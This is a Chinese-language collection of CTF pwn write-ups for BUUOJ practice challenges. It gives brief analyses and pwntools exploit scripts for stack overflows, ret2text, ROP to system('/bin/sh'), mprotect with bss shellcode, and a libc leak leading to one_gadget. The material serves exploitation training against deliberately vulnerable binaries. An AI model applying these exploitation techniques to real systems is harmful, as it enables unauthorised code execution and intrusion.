看main函数,我直呼好家伙,这句子它先就是个神奇的句子。
很明显一个栈溢出。
很明显看到了关键函数。
栈溢出之后一般32位程序ebp之后就是返回地址,但是在32的main函数中,ebp之后先是三个参数,然后才是返回地址,因为get flag 函数中传入了参数并且对参数有判断,所以在栈溢出的时候返回地址后面写上返回函数的返回地址,再写入两个参数,名满足调用规则,从右往左先入栈,所以地址后面紧跟a1,然后才是a2.
但是调一下就会发现,这程序返回是用add ret返回的,所以0x38之后直接就是返回地址。
但是又注意到,传参进来后v3,v5的数据类型是unsigned_int8,就一个字节,是无符号的,表示0-255,根本达不到下面判断语句中的那么大,所以调整返回地址,直接调整到进入下面输出flag的地方。
顺便说一下getc函数,就是在C语言中,用函数getc(fgetc)从文件读取字符。
然后就写脚本
exp
'''
from pwn import*
context.log_level = "debug"
#r = remote('node3.buuoj.cn',28988)
r = process('./2016')
#gdb.attach(r, 'b gets')
flag_addr = 0x80489b8
payload = 'a' * 0x38
payload += p32(flag_addr)
r.recvuntil("Qual a palavrinha magica? ")
r.sendafter(payload)
r.interactive()
'''
from pwn import*
p=process('./2016')
gdb.attach(p)
payload='a'*0x38+p32(0x80489b8)
p.sendline(payload)
p.interactive()
发现个好玩的,上面那个被注掉的是我刚开始写的,不能用,一到recv就卡住了,我直呼好家伙。
其实通了,只不过它程序是读你里面的flag.txt但是你没有而已。
然后我发现里面有syscall,所以也可以直接ret2syscall
本来想直接在这里把exp贴上来,没想到在调试它的过程中出现了很多状况,记录在了下面(doge)。
buuoj pwn get_started_3dsctf_2016 ret2syscall
我们也可以通过mprotect改它的权限,因为开了NX,所以shellcode写不上去,我们先把权限改了,然后把shellcode写在bss段上,然后跳过去执行。
然后要用到pop,因为在给mprotect传参的时候函数是直接ret的,所以我们需要帮助他。
exp
from pwn import *
from LibcSearcher import *
context.os='linux'
context.arch='i386'
context.log_level='debug'
r = process('./2016')
elf=ELF('./2016')
bss=0x080eb000
pop_ebx_esi_edi_ret=0x080509a5
payload='a'*0x38+p32(elf.sym['mprotect'])+p32(pop_ebx_esi_edi_ret)+p32(bss)+p32(0x2d)+p32(7)+p32(elf.sym['read'])+p32(bss)+p32(0)+p32(bss)+p32(0x2d)
r.sendline(payload)
payload=asm(shellcraft.sh())
r.sendline(payload)
r.interactive()
进来首先看到部署在Ubuntu18上面,所以system需要考虑栈对齐。
然后发现
这个跟第7个ciscn_2019_c_1一摸一样嘛
buuoj pwn wp 1-10
首先发现它又是部署在Ubantu18上面
检查一下保护
鼠标放在var上面可以发现它是四个字节的,但是下面var13那里是用QWORD读的,就是八个字节。
所以只要输入的时候var13那里输入个8字节的17就好了。
from pwn import*
r = remote('node3.buuoj.cn',27724)
payload = 'a' * 4 * 13 + p64(17)
r.sendline(payload)
r.interactive()
有两个后门函数,但是里面参数不对,里面有明显的栈溢出,想的是改变函数的参数为‘/bin/sh’,但是发现参数在.rodata段。
我们可以不要那个参数,自己写/bin/sh,或者看看程序里面有没有,查了一下,还真有,那就完了嘛 ROP一把梭。
exp
from pwn import*
r = remote('node3.buuoj.cn',26358)
system_addr = 0x0804845C
bin_sh = 0x804a024
payload = 'a' * 140 + p32(system_addr) + p32(bin_sh) + p32(bin_sh)
r.sendline(payload)
r.interactive()
exp
from pwn import*
r = remote('node3.buuoj.cn', 28760)
#r = process('./2016')
elf = ELF('./2016')
secret_addr = 0x80489a0
write_addr = 0x806e270
bss_addr = 0x80eca2d
payload = 'a' * 0x2d + p32(secret_addr) + p32(write_addr) + p32(write_addr) + p32(1) + p32(bss_addr) + p32(50)
r.sendline(payload)
r.interactive()
但是怎么利用?
发现它给留了个这玩意。
因为开了PIE
通过这个可以泄露地址,然后计算libc的基地址,从而得到one_gadget的地址,就好了。
exp
from pwn import*
#r = process('./one')
r = remote('node3.buuoj.cn',27708)
context.log_level = "debug"
libc = ELF('libc-2.29.so')
one_gadget = 0x106ef8
r.recvuntil('0x')
printf_addr = int(r.recvuntil('\n')[:-1],16)
#int这块后面的16指的是把字符串当成16进制的字符串转化为十进制整数。
print printf_addr
libc_base = printf_addr - libc.sym['printf']
one_addr = libc_base + one_gadget
r.sendline(str(one_addr))
r.interactive()
ret2text
所以就直接一把梭嘛。
有个小细节
就是你看他那个栈帧的时候你会发现,挺奇怪的。
我们实际调一下。
exp
from pwn import*
#r = process('./baby')
r = remote('node3.buuoj.cn',26010)
context.log_level = "debug"
backdoor = 0x4006e6
payload = 'a' * 0x18 + p64(backdoor)
r.sendlineafter('[+]Please input the length of your name:', '32')
r.sendlineafter('[+]What\'s u name?', payload)
r.interactive()
exp
from pwn import*
#r = process('./babyrop')
r = remote('node3.buuoj.cn',29212)
context.log_level = "debug"
system_addr = 0x4005e3
bin_sh = 0x601048
pop_rdi = 0x400683
payload = 'a' * 0x18 + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
r.sendline(payload)
r.interactive()
保护。
栈溢出一把梭
from pwn import*
#r = process('./babyrop')
r = remote('node3.buuoj.cn',29380)
context.log_level = "debug"
system_addr = 0x400603
bin_sh = 0x600a90
pop_rdi = 0x4006b3
payload = 'a' * 0x88 + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
r.sendline(payload)
r.interactive()
典型的ret2shellcode
但是发现NX没开,所以我们可以写一段shellcode在bss上,然后栈溢出跳过去。
exp
from pwn import *
context.arch = 'amd64'
#写shellcode要加这个
context.log_level = 'debug'
r = remote("node3.buuoj.cn" , 29994)
shellcode = asm(shellcraft.amd64.sh())
#shellcode这样写
bss_addr = 0x601080
r.recvuntil("tell me your name")
r.sendline(shellcode)
r.recvuntil("What do you want to say to me?")
payload = 'a'* 0x28 + p64(bss_addr)
r.sendline(payload)
r.interactive()